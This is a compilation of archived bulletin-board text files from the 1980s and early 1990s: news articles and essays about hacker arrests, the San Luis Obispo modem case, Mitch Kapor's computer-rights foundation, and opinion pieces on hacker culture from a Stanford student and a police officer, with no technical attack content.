Law-enforcement officials accuse Kapor of romanticizing crooks who are violating the rights of their victims, and most people still think that hackers are a big ger threat than cops. But the crackdown has spurred Kapor and such industry lege nds as Apple Computer cofounder Steve Wozniak to band together behind the new ge neration. Their goal: to protect the flow of information and innovation that hel ped bring about the personal-computer revolution. Within the next few weeks they will officially announce a new foundation, yet unnamed, intended to combat comp uter phobia and provide legal aid for some of those snared in the dragnet. The computer-rights movement has gained support on Capitol Hill, where Senator Patric k Leahy, Democrat of Vermont, has planned upcoming hearings on how far law enfor cement should go. While advocating some punishment for lawbreakers, Leahy adds, "We cannot unduly inhibit the 13-year-old who, if left to experiment today, may tomorrow develop the telecommunications or computer technology to lead the Unite d States in the 21st century. He represents our future and our best hope to rema in a technologically competitive nation."

It's not that Kapor thanks he's defending choirboys. Although some hackers insis t they should be able to traipse digitally wherever they please, Kapor says that trespassers should be prosecuted -- "I don't want people breaking in where they don't belong." But he says the zealousness of the investigations is out of prop ortion to the threat. To Kapor, there is more at stake than keeping a bunch of t eenagers out of jail. He cites the case of Craig Neidorf, the University of Miss ouri student indicted after his electronic newsletter, Phrack, featured the priv ate telephone-company document. If the government is right in Neidorf's case, sa ys Kapor attorney Terry Gross, The New York Times could have had its printing pr esses confiscated for publishing the Pentagon Papers. "It's very, very clear Fir st Amendment implications should threaten all traditional media," says Gross -- whose firm, Rabinowitz, Boudin, Standard, Krinsky and Lieberman, represented Pen tagon Papers leaker Daniel Ellsberg.

Not everyone is singing along with Mitch. Software companies, long angry over "p iracy" (passing around bootleg copies of programs), are glad to see the authorit ies cracking down. Ken Wasch, executive director of the Software Publishers Asso ciation, calls Kapor a friend, but says, "For Mitch to believe that there is a g overnment-sponsored witch hunt going on is completely without foundation." Gail Thackeray, an Arizona assistant attorney general who deals with high-tech crime, insists the authorities are being mindful of civil rights. She predicts that wh en the facts come out at the various trials, the cops will be vindicated: "Some of these people who are loudest on the bandwagon may just slink back into the background." Thackeray dismisses claims that prosecution will shut down legitimate computer networks; she speaks approvingly of one former hacker who told agents he had quit as word spread of the raids. "That's not, to me, a constitutionally suspect chilling effect," she says. "That's what we in law enforcement call a "deterrent'."

If Kapor's stance seems surprising, he's used to surprising people. His 1-2-3 bu ndle of business tools was an overnight hit, making in a multimillionaire. Once his Lotus Development Corp. became a giant, he shocked the industry again by wal king away; Lotus, he says, had outgrown its innovative beginnings. "Most of what you do in business is business," he explains. "I'm interested in business as a medium for creating products." He is now creating products again at his new firm, Cambridge, Massachusetts-based On Technology.

Kapor developed the idea for the computer foundation with John Perry Barlow, a w riter and self-described "professional techno-crank." Barlow says hackers typica lly try to sound more dangerous than they really are, a kind of digital vogueing. He says most live by a "hacker ethic" described by a Phrack essay. The piece tells prospective hackers to do no harm, because "The thrill of a hack is not in breaking the law, it is in the pursuit of knowledge." Barlow says if this weren't the case, there would be even more damage to computers.

With the outlines of the organization sketched out, Kapor began calling on frien ds in the industry. While some have been reluctant, there was one instant conver t: Apple cofounder Wozniak. Like Kapor, Wozniak walked away from his company when it grew too far past its funky beginnings. He has since put on rock concerts, gone back for his college degree and taken stabs at high-tech ventures. Wozniak says a little mischief is important to the quest for knowledge. He credits his college experience building "blue boxes" (devices for making free phone calls) wi th honing his hardware-design skills. He compares electronic trespass to driving a few miles per hour over the speed limit. There are people who never break any such rules, he says, but adds, "do you think I'd want my son to turn out like that, or marry one? I'd still support him, but ... I kinda hope he has a more fun life." "Woz" pledged to match Kapor's contribution, which helped put the initial funding over $150,000.

Kapor, captain of his high-school math team, has thrown in his lot with the nerds. He and his allies are attempting nothing less than to keep the ideals of the computer revolution alive. They hope to turn around a public increasingly resent ful of computers and the people who are adept at using them. "You've got a lot of people who don't understand the present," Barlow says, "and in the absence of understanding, default to fear ... The real disease here is future shock." Somebody has to stand up for the pencil-necked and pimply. Luckily for them, the men who have chose to do so are filthy rich. ____________

Great Moments in Mischief (side box)

The word "hacker" once meant any dedicated programmer; lately it's taken on a criminal tone. Some events that got us from there to here:

     o  September 1970: John Draper makes free calls with a cereal-box whistle that matches AT&T's tones. Hence his nom de hack: Captain Crunch.
     o  1986: The Computer Fraud and Abuse Act passes, toughening police powers against hackers.
     o  February 1990: Four indictments in an alleged scheme authorities say endangered 911 service. They cite a group calling itself "Legion of Doom."
     o  May 1990: Robert T. Morris Jr. is found guilty of setting loose a "worm" program that stilled thousands of linked computers in November 1988. His senten ce includes no jail time.
     o  May 1990: Operation Sundevil, one of several antihacker investigations, seizes 42 computer and 23,000 floppy disks in 14 cities with four arrests.

                                           
                           AMATEUR HACKERS TRIPPED UP
                              By Danna Dykstra Coy

This article appeared in the Telegram-Tribune Newspaper, San Luis Obispo, CA.  
March 23, 1991. Permission to electronically reproduce this article was given 
by the newspaper's senior editor.  

                                     *****

San Luis Obispo police have cracked a case of computer hacking.  Now they've 
got to work out the bugs.  Officers were still interviewing suspects late 
Friday linked to a rare case of computer tampering that involved at least four 
people, two of them computer science majors from Cal Poly.  

The hackers were obvious amateurs, according to police.  They were caught 
unknowingly tapping into the computer system in the office of two local 
dermatologists.  The only information they would have obtained, had they 
cracked the system's entry code, was patient billing records.  

Police declined to name names because the investigation is on-going.  They 
don't expect any arrests, though technically, they say a crime has been 
committed.  Police believe the tampering was all in fun, though at the expense 
of the skin doctors who spent money and time fixing glitches caused by the 
electronic intrusion.  

"Maybe it was a game for the suspects, but you have to look at the bigger 
picture," said the officer assigned to the case, Gary Nemeth.  "The fact they 
were knowingly attempting to access a computer system without permission is a 
crime."  Because the case is rare in this county, police are learning as they 
go along.  "We will definitely file complaints with the District Attorney's 
Office," said Nemeth.  "They can decide whether we've got enough of a case to 
go to trial." 

Earlier this month San Luis dermatologists James Longabaugh and Jeffrey Herten 
told police they suspected somebody was trying to access the computer in the 
office they share at 15 Santa Rosa St.  The system, which contains patient 
records and billing information, continually shut down.  The doctors were 
unable to access their patients' records, said Nemeth, and paid a computer 
technician at least $1,500 to re-program their modem.  

The modem is a device that allows computers to communicate through telephone 
lines.  It can only be accessed when an operator "dials" its designated number 
by punching the numbers on a computer keyboard.  The "calling" computer then 
asks the operator to punch in a password to enter the system.  If the operator 
fails to type in the correct password, the system may ask the caller to try 
again or simply hang up.  Because the doctors' modem has a built-in security 
system, several failed attempts causes the system to shut down completely.  

The technician who suspected the problems were more than mechanical, advised 
the doctors to call the police.  "We ordered a telephone tap on the line, which 
showed in one day alone 200 calls were made to that number," said Nemeth.  "It 
was obvious someone was making a game of trying to crack the code to enter the 
system."  The tap showed four residences that placed more than three calls a 
day to the doctors' computer number.  Three of the callers were from San Luis 
Obispo and one was from Santa Margarita.  From there police went to work.  

"A lot of times I think police just tell somebody in a situation like that to 
get a new phone number," said Nemeth, "and their problem is resolved.  But 
these doctors were really worried.  They were afraid someone really wanted to 
know what they had in their files.  They wondered if it was happening to them, 
maybe it was happening to others.  I was intrigued." 

Nemeth, whose training is in police work and not computer crimes, was soon 
breaking new ground for the department.  "Here we had the addresses, but no 
proper search warrant.  We didn't know what to name in a search warrant for a 
computer tampering case."  A security investigator for Pacific Bell gave Nemeth 
the information he needed: disks, computer equipment, stereos and telephones, 
anything that could be used in a computer crime.  

Search warrants were served at the San Luis Obispo houses Thursday and Friday.  
Residents at the Santa Margarita house have yet to be served.  But police are 
certain they've already cracked the case.  At all three residences that were 
searched police found a disk that incorrectly gave the doctors' phone number as 
the key to a program called "Cygnus XI".  "It was a fluke," said Nemeth.  
"These people didn't know each other, and yet they all had this same program".  
Apparently when the suspects failed to gain access, they made a game of trying 
to crack the password, he said.  "They didn't know whose computer was hooked up 
to the phone number the program gave them," said Nemeth.  "So they tried to 
find out." 

Police confiscated hundreds of disks containing illegally obtained copies of 
software at a residence where two Cal Poly students lived, which will be turned 
over to a federal law enforcement agency, said Nemeth.  

Police Chief Jim Gardner said he doesn't expect this type of case to be the 
department's last, given modern technology.  "What got to be a little strange 
is when I heard my officers talk in briefings this week.  It was like `I need 
more information for the database'."  "To think 20 years ago when cops sat 
around and talked all you heard about was `211' cases and dope dealers." 

                                      ###
                      
                          COMPUTER CASE TAKES A TWIST
                              By Danna Dykstra Coy

This article appeared in the Telegram-Tribune Newspaper, San Luis Obispo, CA.  
March 29, 1991. Permission to electronically reproduce this article was given 
by the newspaper's senior editor.  

                                     *****

A suspected computer hacker says San Luis Obispo police overreacted when they 
broke into his house and confiscated thousands of dollars of  equipment.  "I 
feel violated and I'm angry" said 34-year-old engineer Ron Hopson.  All of 
Hopson's computer equipment was seized last week by police who believed he may 
have illegally tried to "hack" his way into an office computer belonging to two 
San Luis Obispo dermatologists.  Police also confiscated equipment belonging 
to three others.  

"If police had known more about what they were doing, I don't think it would 
have gone this far," Hopson said.  "They've treated me like a criminal, and I 
was never aware I was doing anything wrong.  It's like a nightmare."  Hopson, 
who has not been arrested in the case, was at work last week when a neighbor 
called to tell him there were three patrol cars and two detective cars at his 
house.  Police broke into the locked front door of his residence, said Officer 
Gary Nemeth, and broke down a locked door to his study where he keeps his 
computer.  "They took my stuff, they rummaged through my house, and all the 
time I was trying to figure out what I did, what this was about.  I didn't have 
any idea." 

A police phone tap showed three calls were made from Hopson's residence this 
month to a computer at an office shared by doctors James Longabaugh and Jeffery 
Herten.  The doctors told police they suspected somebody was trying to access 
the computer in their office at 15 Santa Rosa St.  Their system, which contains 
patient records and billing information, kept shutting down.  The doctors were 
unable to access their patients' records, said Nemeth.  They had to pay a 
computer technician at least $1,500 to re-program their modem, a device that 
allows computers to communicate through telephone lines.  

Hopson said there is an easy explanation for the foul-up.  He said he was 
trying to log-on to a public bulletin board that incorrectly gave the doctors 
number as the key to a system called "Cygnus XI".  Cygnus XI enabled people to 
send electronic messages to one another, but the Cygnus XI system was 
apparently outdated.  The person who started it up moved from the San Luis 
Obispo area last year, and the phone company gave the dermatologists his former 
number, according to Officer Nemeth.  

Hopson said he learned about Cygnus XI through a local computer club, the SLO-
BYTES User Group. "Any of the group's 250 members could have been trying to tap 
into the same system", said Robert Ward, SLO-BYTES club secretary and computer 
technician at Cal Poly.  In addition, he suspects members gave the phone number 
to fellow computer buffs and could have been passed around the world through 
the computer Bulletin-Board system.  "I myself might have tried to access it 
three or four times if I was a new user," he said.  "I'd say if somebody tried 
50 times, fine, they should be checked out, but not just for trying a couple of 
times." 

Police said some 200 calls were made to the doctors modem during the 10 days 
the phone was tapped.  "They say, therefore, its obvious somebody is trying to 
make a game of trying to crack the computer code", said Hopson.  "The only 
thing obvious to me is a lot of people have that published number.  Nobody's 
trying to crack a code to gain illegal access to a system.  I only tried it 
three times and gave up, figuring the phone was no longer in service." 

Hopson said he tried to explain the situation to the police.  "But they took me 
to an interrogation room and said I was lying.  They treated me like a big-time 
criminal, and now they won't give me back my stuff."  Hopson admitted he owned 
several illegally obtained copies of software confiscated by police.  "But so 
does everybody," he said, "and the police have ever right to keep them, but I 
want the rest of my stuff." 

Nemeth, whose training is in police work and not computer crimes, said this is 
the first such case for the department and he learning as he goes along.  He 
said the matter has been turned over to the District Attorney's Office, which 
will decide whether to bring charges against Hopson and one other suspect.  

The seized belongings could be sold to pay restitution to the doctors who paid 
to re-program their system.  Nemeth said the police are waiting for a printout 
to show how many times the suspects tried to gain access to the doctors' modem.  
"You can try to gain access as many times as you want on one phone call.  The 
fact a suspect only called three times doesn't mean he only tried to gain 
access three times." 

Nemeth said he is aware of the bulletin board theory.  "The problem is we 
believe somebody out there intentionally got into the doctors' system and shut 
it down so nobody could gain access, based on evidence from the doctors' 
computer technician," said Nemeth.  "I don't think we have that person, because 
the guy would need a very sophisticated system to shut somebody else's system 
down."  At the same time, he said, Hopson and the other suspects should have 
known to give up after the first failed attempt.  "The laws are funny.  You 
don't have to prove malicious intent when you're talking about computer 
tampering.  The first attempt you might say was an honest mistake.  More than 
once, you have to wonder." 

Police this week filled reports with the District Attorney's Office regarding 
their investigation of Hopson and another San Luis Obispo man suspected of 
computer tampering.  Police are waiting for Stephen Brown, a deputy district 
attorney, to decide whether there is enough evidence against the two to take 
court action.  If so, Nemeth said he will file reports involving two other 
suspects, both computer science majors from Cal Poly.  All computers, 
telephones, computer instruction manuals, and program disks were seized from 
three houses in police searches last week.  Hundreds of disks containing about 
$5,000 worth of illegally obtained software were also taken from the suspects' 
residences.  

Police and the District Attorney's Office are not naming the suspects because 
the case is still under investigation.  However, police confirmed Hopson was 
one of the suspects in the case after he called the Telegram-Tribune to give 
his side of the story.  

                                      ### 
                           
                      HACKERS' OFF HOOK, PROPERTY RETURNED
                              By Danna Dykstra Coy

This article appeared in the Telegram-Tribune Newspaper, San Luis Obispo, CA.  
April 12, 1991. Permission to electronically reproduce this article was given 
by the newspaper's senior editor.  

                                     ***** 

Two San Luis Obispo men suspected of computer tampering will not be charged 
with any crime.  They will get back the computer equipment that was seized 
from their homes, according to Stephen Brown, a deputy district attorney who 
handled the case.  "It appears to have been a case of inadvertent access to a 
modem with no criminal intent," said Brown.  San Luis Obispo police were 
waiting on Brown's response to decide whether to pursue an investigation that 
started last month.  They said they would drop the matter if Brown didn't file 
a case.  

The officer heading the case, Gary Nemeth, admitted police were learning as 
they went along because they rarely deal with computer crimes.  Brown said he 
dosen't believe police overreacted in their investigation.  "They had a 
legitimate concern." 

In early March two dermatologists called police when the computer system 
containing patient billing records in their San Luis Obispo office kept 
shutting down.  They paid a computer technician about $1,500 to re-program 
their modem, a device that allows computers to communicate through the 
telephone lines.  The technician told the doctors it appeared someone was 
trying to tap into their system.  The computer's security system caused the 
shutdown after several attempts to gain access failed.  

Police ordered a 10-day phone tap on the modem's line and, after obtaining 
search warrants, searched four residences where calls were made to the skin 
doctors' modem at least three times.  One suspect, Ron Hopson, said last week 
his calls were legitimate and claimed police overreacted when they seized his 
computer, telephone, and computer manuals.  Hopson could not reached Thursday 
for comment.  

Brown's investigation revealed Hopson, like the other suspects, was trying to 
log-on to a computerized "bulletin-board" that incorrectly gave the doctors' 
number as the key to a system called "Cygnus XI".  Cygnus XI enabled computer 
users to electronically send messages to one another.  Brown said while this 
may not be the county's first computer crime, it was the first time the 
District Attorney's Office authorized search warrants in a case of suspected 
computer fraud using telephone lines.  Police will not be returning several 
illegally obtained copies of software also seized during the raids, he said.  


                                      ###
 
%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%
:                                     :
%           Hacker 'Theives'          %
:                                     :
%             Typed by:               %
:          *> Silent Rebel <*         :
%                                     %
:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:
 
Taken from: Chicago Sun-Times
            July 18, 1985
 
            HACKER 'THIEVES'
    Teens' computer cheating probed
 
 SOUTH PLAINFIELD,N.J.- Several teenage
computer buffs called around the world 
for free, used other people's credit 
cards and forced the Pentagon and a 
telephone company to check for security
breaches, authorities said yesterday.
 They said they were plowing through
information the youths stored and 
checking whether any of the 630 people
nationwide whose names have been found
were involved in illegal behavior.
  In the meantime, the seven have been
charged with juvenille delinquency in a
conspiracy to gain access to computers
without proper authorization. Their
equipment was confiscated, but they 
were allowed to stay in the custody of
their parents.
  The case was cracked by Patrolman
Michael Grennier, a computer buff who
spent 150 hours at his keyboard with
South Plainfield Detective George Green
to track down the youthful hackers.
  Green described them as inquisitive 
teens from normal, everyday families.
Of the 630 people whose names were 
found, he said, "90 percent probably
didn't do anything illegal."
  "Most of the parents do not know 
that their son is actually doing this;
they are intimidated by the system
and they're just letting their son go
on with whatever he's doing," Grennier
said."I suggest that parents get more 
involved with their sons' computers."
  Middlesex County Assistant Prosecutor
Frank Graves said flatly of the seven
hackers: "They're just a bunch of 
little kids who have computers-and 
they're thieves."
  Green said the youths were exchanging
information on a computer bulletin
board that contained information on
false credit card numbers, instructions
for making a letter bomb and directions
for making devices that trick the
telephone company into charging calls
to other parties.
  Grennier said the youths somehow 
gained access to AT&T manuals that he
described as corporate secrets. The 
information allowed them to make free
overseas calls using a satellite, he 
said.
  Green said there is evidence the 
youths got into the computer system of
a credit rating company and a medical
library that should have been limited
to subscribers.
  Green said two youths have admitted
the telephone and credit card charges.
He said police know the two received a
car speaker stereo system, a radar
detector and magazine subscriptions and
they suspect that thousands of dollars
worth of goods and services were 
obtained free.
  Prosecutors said yesterday the youths
had access to the private numbers of 
Defense Department officials,including
top generals, and Prosector Allan 
Rockoff said their activities included
"changing the position of satellites."
  But Graves said later Rockoff was 
referring to the fact that when phone
calls are relayed by satellites, parts
must move to make the transmission.
  "There is absolutely no way computer
hackers can interrupt or move 
satellites,"said Neal Norman,district
manager of corporate security for AT&T
Communications.
  The Pentagon also said there was no
penetration of its computers.
 
%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%
:                                     :
%This was a production of Silent Rebel%
:                                     :
%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%
 
 
[Ripco] Which 1-60 ?=menu,<CR>=abort:

[Ctrl-S Stop/Start] [Spacebar to Exit]
 
 
RIPCO Main G-Phile Menu         7/24/88
---------------------------------------
 
Sub-menu selections:
                           last updated
(1)  Telecom Series            7/24/88 
(2)  Numbers                   7/24/88
(3)  Anarchy                   7/24/88
(4)  Telecommunications        7/24/88
(5)  Misc.                     7/24/88
(6)  Apple ][ Files            7/24/88
(7)  Newspaper & Law Articles  7/24/
 
Main Command Level <?=help>
[(>.
Date: Wed, 25 Sep 91 15:33:05 MDT
From: ahawks@isis.cs.du.edu (Andy Hawks)
Subject: Denver Hacker Hacks NASA
The Denver Post, Denver & The West section   p. 1     9/25/91

NASA vs. hobbyist

Computer whiz accused of illegal access, mischief

By. Peter G. Chronis
Denver Post staff writer

An Aurora computer hobbyist who allegedly used a personal computer and his home
phone to penetrate NASA computers hacked off Uncle Sam enough to be indicted on
seven federal counts yesterday.

Richard G. Wittman, 24, the alleged "hacker," was accused of two felonies,
including gaining unauthorized access to NASA computers to alter, damage, or
destroy information, and five misdemeanor counts of interfering with the
government's operation of the computers.

Wittman allegedly got into the NASA system on March 7, June 11, June 19, June
28, July 25, July 30, and Aug. 2, 1990.

Bob Pence, FBI chief in Denver, said Wittman used a personal computer in his
home and gained access to the NASA systems over telephone lines.

The investigation, which took more than a year, concluded that Wittman accessed
the NASA computer system and agency computers at the Marshall Space flight
Center in Huntsville, Ala., and the Goddard Space Flight Center in Greenbelt,
Md.

The NASA computers are linked to a system called Telenet, which allows
qualified people to access government data bases.  A user name and password are
required to reach the NASA computers.

Federal sources declined to reveal more information because the complex case
involves "sensitive material."

Wittman, a high-school graduate, apparently hadn't worked in the computer
industry and held a series of odd jobs.

The felony counts against him each carry a possible five-year prison term and
$250,000 fine.

            [I suppose the Denver authorities locked up his PC to prevent him 
            from using it.  They must have used a Denver Boot Load.  PGN]

                [For our out-of-country users, a Denver Boot is a fiendish
                device that police attach to a wheel to prevent you from
                driving your car until you have paid up all outstanding fines.
                Of course, more fines accumulate unless you pay immediately.]

	     THE HACKER PAPERS (PSYCHOLOGY TODAY AUG. '80)
		  DRAWN FROM THE STANFORD UNIVERSITY
		LOW OVERHEAD TIME-SHARING SYSTEM(LOTS)


FROM: G. GANDALF (Kenneth Peter)
TO: BULLETIN BOARD
SUBJECT:ESSAY ON HACKING


  Dedicated to all my friends at LOTS who will live their lives in a alien
culture surrounded by humanity, and to Ernest, who was too human for it.

  As much as an essay, this is a story.  It is a true story of people paying
$9,000 a year to lose elements of their humanity.  It is a story of the breaking
of wills and of people.  It is a story of addictions, and of misplaced values.
In a large part, it is my own story.

  There is no one field in particular in academia that has a monopoly on
production of single-interest people, and this practice can exist almost
anywhere.  There is the political power seeker, all-consumed by climbing up the
bureaucratic rungs.  There is the stereotyped pre-med, ignoring all but his MCAT
scores.  There is the compulsive artist or writer, forever lost in his work.
Narrowness is widespread.  But there is one field that seems to be more
consistent in this practice.  This essay, rooted in personal and painful
experience, is about the people in computer science.

  In the middle of Stanford University there is a large concrete- and-glass
building filled with computer terminals.  When one enters this building through
the glass doors, one steps into a different culture.  Fifty people stare at
terminal screens.  Fifty faces connected to 50 bodies, connected to 50 sets of
fingers that pound on 50 keyboards ultimately linked to a computer.  If you go
further inside, you can discover the true addicts:  the members of the
Establishment.	These are the people who spend their lives with computers and
fellow "hackers".  These are the members of a subculture so foreign to most
outsiders that it not only walls itself off but is walled off, in turn, by those
who cannot understand it.  The wall is built from both sides at once.

  These people deserve a description.  In very few ways do they seem average.
First, they are all bright, so bright, in fact, that they experienced social
problems even before they became interested in computers.  Second, they are
self-contained.  Their entire social existence usually centers around one
another.  Very, very few remain close to their families.  Very, very few
associate much with anyone who is not at least partially a member of the hacking
group.	While they do sometimes enjoy entertainment unrelated to their field, it
is almost always with fellow hackers.  Third, all aspects of their existence
reinforce one another.	They go to school in order to learn about computers,
they work at jobs in programming and computer maintenance, and they lead their
social lives with hackers.  Academically, socially, and in the world of cash,
computers are the focus of their existence.

  The hacker will probably not strongly disagree with what has been said so far.
But he will ask the question, "So what?" The answer is:  in creating a
subculture and isolating it, we are destroying the chance that computers might
be used wisely as an integral part of our society.  We are precluding the human
values so necessary for the wise application of this technological achievement.
The most brilliant young minds at our top universities are learning how to play
with multi-million dollar toys first, and how to utilize them constructively
second.

  Even if we ignore the costs to society as a whole, we have to look at the
costs to the people involved.  The computer is a modifier of personalities.  It
is highly addictive.  People who gain this addiction for a period of several
months tend never to give it up.  And the symptoms are very sad.

  The first thing to go is other academic interests.  Basically what occurs is
that the hackers motivation to challenge themselves in any field not directly
linked to computers gradually disint- egrates.	On the level of grades,
straight-A students tacitly accept C's in noncomputer courses.  On the level of
actual learning, the same students shut off outside subjects even more
completely than their grades would indicate.  This is common in many areas of
specialization, but nothing compares with the incredible consumption of computer
science students for computer science courses, and their non-chalant attitude
toward every other class.

  The second thing to go is a normal living pattern.  Eating and sleeping are
completly rearranged to fit the addiction.  The typical hacker thinks nothing of
eating one meal a day and subsisting on junk food, or of sleeping from 4 a.m.
to noon almost every day of the week.  Families are soon disregarded, to an
extent uncommon even when one considers the separtion that generally occurs in
college.  It is simply that the parents of hackers are ignorant of the
subculture and cannot relate.

  The third thing to go is a balanced social life.  The hackers' narrowness and
strange schedule simply compound the social problems they experienced before
hackerdom.  Soon, no one except a hacker has the capability to understand other
hackers.  No one except a hacker will go out with other hackers.  No one except
a hacker can talk to another hacker.

  The forth and final thing that happens is also the saddest.  The personality
of the hacker shifts, in order to permanently adjust to the new social
conditions.  Emotions always hurt before so they are effectively isolated.
Relations with nonhackers become strained, so why force the effort?  It is so
much easier just to accept social rejection and isolation, and to do it with a
spirit of camraderie that's shared by the rest of the subculture.

  An essay should make an attempt to resolve the problem it points out.  In this
case, the pointing may be enough, or at least enough to do whatever can be done.
I know from personal experience what a trauma it can be.  I was one of the top
10 among several thousand LOTS users last spring for the amount of time I spent
here.  I have watched people close to me undergo the transformation.  I narrowly
escaped it.

  The tragedy is that I am so involved in piecing my personality and social life
back together that I think I have learned very little about how to prevent this
from happening in the first place.  I am lucky.  I will go on to some sort of a
balanced life (although my hacker friends will laugh at me, since, to them, my
involvment was never serious enough to make me one of them).  Weak-willed
people, people with unstable social lives, people in formative stages of their
lives, should not become involved in computer science.	It should be left until
they are truly able to make decisions and be aware of all the consequences.
Computers are most often used by people who start when they are immature.  This
is what causes the single-minded addiction.  This is what takes some of the
brightest and most capable minds in college today and turns them to narrowness.

---------------------------------------
4


                    Copyright 1986 Ken McLeod


                     HACKERS: Friend of Foe?


Much has been said and written lately about hackers and their activities.
From attempting to reposition communications satellites to break-ins at
computer facilities throughout the world.  Is this just hype?  Do these
precocious children really possess the keys to computer disarmament?

I could tell many sexy stories about hacker activity.  Computers broken
into, monetary fraud, late night sojourns to computer sites, ad infinitum, 
ad nauseum.  I don't think salacious stories about highly motivated but
misguided teenagers is the real issue.  What is germain is that hackers
represent a real and serious threat to information processing and are a
problem created by society.

Computer security personnel are faced with a modern day Hobson's choice.
Do they ignore the "hackers", or, do the entrench themselves in a Maginot
line of technical ramparts.  Either choice may result in serious if not
financially fatal costs to an organization.

Hackers seem to have become steeped in an aura of technological mysticism--
often perceived as the Druids of the Church of Information Processing.
Are video display terminals really their Oracle's?  You be the judge!

While the popular belief, at least within the "hacker culture", is to
believe in an embodiment of computers and computer programming for the
greater goal of understanding computer technology, in reality, most
people espousing the "hacker ethic" actually fit quite nicely into the
definition of a criminal.

My "Theory of Hacking" was developed after I arrested more hackers than
probably any other single law enforcement officer and in response to the
inability of anyone else to explaing why hackers "hacked."

Having had the privilege of conducting what was essentially empirical 
research while enforcing the law -- numerous hackers were arrested and
interviewed.

During my interviews with the hackers a strange pattern developed which
seemed to be shared by most, if not all of those persons arrested.
"Information may not be owned", was the recurrent theme.  Each hacker
seemed determined to rationalize why he, (or rarely "she"), felt it 
necessary to commit a criminal act in furtherance of the divine act of
"Information Acquisition." This was strange behavior for a criminal,
at least from the point of view of a traditional law enforcement officer.

Why was the mere "reading" of data contained in a computer so important
in the life of a hacker?  What spiritual nirvana was reached when the 
ultimate goal has been reached: "Access Granted."

A complete enforcement re-evaluation was required to combat the hacker
problem.  A realization came about when traditional views of the value
of information was ignored, i.e. information = money, and a new outlook
adopted: information = value/status/power.  While the equations may at
first glance seem equal, the variables of value, status and power have 
a much greater meaning among peers.

Hackers, when compared to the public perception of a "common criminal",
are not breaking into computer systems using the same standards as a
conventional burglar (if criminal standards can exist!).  A burglar or
robber is usually concerned with simply the monetary value of what he
steals.  A hacker tends to have different motives although the end
result may be the same.

In accepting the fact that hackers seek information (usually) not for
its pecuniary value, but for its value as a commodity of status and
reputation, then we have reached the first step in combating hackers.
What was and is really happening is that hackers are merely a logical
metamorphosis of our reliance on the flow and value of data and informa-
tion in our modern society.

Hackers are not some subterranean breed of criminal who has learned the
innermost secrets of the information age.  In reality they are our own
technologically created demons.

Modern society has bred a generation of youngsters who have been taught
to communicate and pass information as naturally as eating and sleeping.
These hackers, for they usually are younger, realize that to possess
information is the first step to power; for information in and of itself
denotes power.

It is not illogical that hackers are our own worst nightmares, created
from ignorance and apathy.  Hackers are simply eating at the trough of
information which computer managers so eagerly spread throughout society,

To combat hackers two attitudes must be accepted by computer professionals-
- 1) Hackers have been created by society and are a natural extension of
that society; and, 2) Apathy and ambivalence are rampant throughout the
computer field.

Hackers create no new problems, they simply feed on those areas in which
computer designers, operators and managers have failed to protect.

Law Enforcement is faced with serious problems in attempting to
investigate and prosecute hackers.  Computer professionals refuse to
identify or report suspected or actual cases of computer crime, for fear
of losing face amongst their peers.

Too often hacker attacks, from inside or outside a company, are considered
personnel problems, rather than crimes.  Managers refuse to believe that
some of the employees might acutally fit the hacker mold and fail to act
accordingly.

In November of 1984 one of the first hacker arrests I made was of a 28
year old school teacher.  Since that time the ages of suspects or
arrestees has steadily decreased to where we have detected cases of
computer fraud committed by 12 year olds.  Attempts to break into
financial, government and private computers are discussed among hackers
as easily as talking about the latest football scores.

Groups of children now regularly control information secretly removed
from the computers of America's largest corporations and government
institutions.  Arrests only tend to credentialize the hackers, making them
experts in the eyes of many.

This is disturbing.  Are we to create a system of jails for the young
intellectuals on out society?  Certainly not!  What is the answer?

I believe that two things are going to occur--one a sure bet, the second
worthy of debate.  The first is that computer fraud dba "hacker activity"
will continue to increase in both scope and complexity with correspondingly
exponential losses.  The second is that computer security professionals will
continue to be slow to come around to accepting the fact that hackers are
a part of the fabric of society and that to be dealt with, they must first
be understood.

Law Enforcement can not be the lone cry in the wilderness, baying for
computer users to safeguard their information.  Computer professionals
must proactively protect their systems through a synergistic system of
awareness, acceptance and technical competence.  Pseudo-experts and
"reformed hackers" are not the answer.  Only through a policy of total
commitment to computer security will the hcaker problem by effectively
dealt with.


z
/* All comments by Digital Derelict. */


                     Hackers of the World, Unite!
                     ============================

                     From Newsweek, July 2, 1990

                          By John Schwartz

                         Typed by Mortimer

                    A production of Hanford BBS.

                 /* Comments by Digital Derelict */

        It is not your average keynote speech.  It's more like a call to
 arms.  A couple of hundred software developers sit entralled by Mitch
 Kapor, who dropped by their recent Ann Arbor in his private jet - one of
 the nifty things you can buy for yourself if you happen to be the guy who
 wrote Lotus 1-2-3.  The once portly computer star has shed 25 pounds
 lately through a determined combination of exercise and diet.  He's
 doffed his jacket and slipped on a convention T shirt over his shirt and
 tie.  While this fashion statement might be confused, his message is not:
 There's a threat out there.  Not computer viruses.  Not nasty hackers.
 It's the Feds.

/* This is something that publications like PHRACK INC. (rest in peace),
   LOD/H (also shut down), and any BBSers that have bothered to pull their
   head(s) out have been saying for a decade.  Amazing how fast news travels,
   huh?                                                                 */

        Kapor first asks which members of the audience use electronic
 "bulletin boards" and conference systems.  Almost all the hands go up.
 Kapor then puts the scare into them with tales from the "hacker dragnet".
 Law-enforcement agencies have stepped up efforts against computer crime
 [fun timeline at the end].  Kapor believes that they have gone too far.
 He cites police raids on teenagers' homes, with guns drawn and family
 members forcibly restrained.  He tells of widespread equipment seizures,
 and the raid that nearly shut down Steve Jackson Games, a small Austin,
 Texas, producer of fantasy role-playing games - even though it was not a
 target of the investigation.

/* Actually, what happened was that an employee of SJ Games was formerly
   affiliated with The Phoenix Project, a perfectly legal BBS that was shut
   down by the Pigs -* er, the Feds the instant that the sysop (it is not
   clear which, but The Mentor was one) announced that they were going to start
   using an E-Mail encryption routine.  The Mentor had invited a few Feds to
   come and join them in discussions on the board to prove that it wasn't
   anything to be afraid of, thus the immediate response.  As far as this
   author knows, the equipment was never returned, no charges were pressed, and
   it had nothing to do with an investigation.  It was allegedly affiliated
   with LoD (publishers of LoD/H Technical Journal), which is the current
   target of this new McCarthyism.  LoD was allegedly connected with the E911
   case, where The Prophet leaked the contents of the E911 document to Knight
   Lightning, publisher of PHRACK. If this is a valid excuse for nearly
   shutting down the publishers of the 'GURPS' RPG series, the Feds as
   far gone as I suspected. The year '1984' comes to mind.              */

        And he talks about a student indicted on charges stemming from
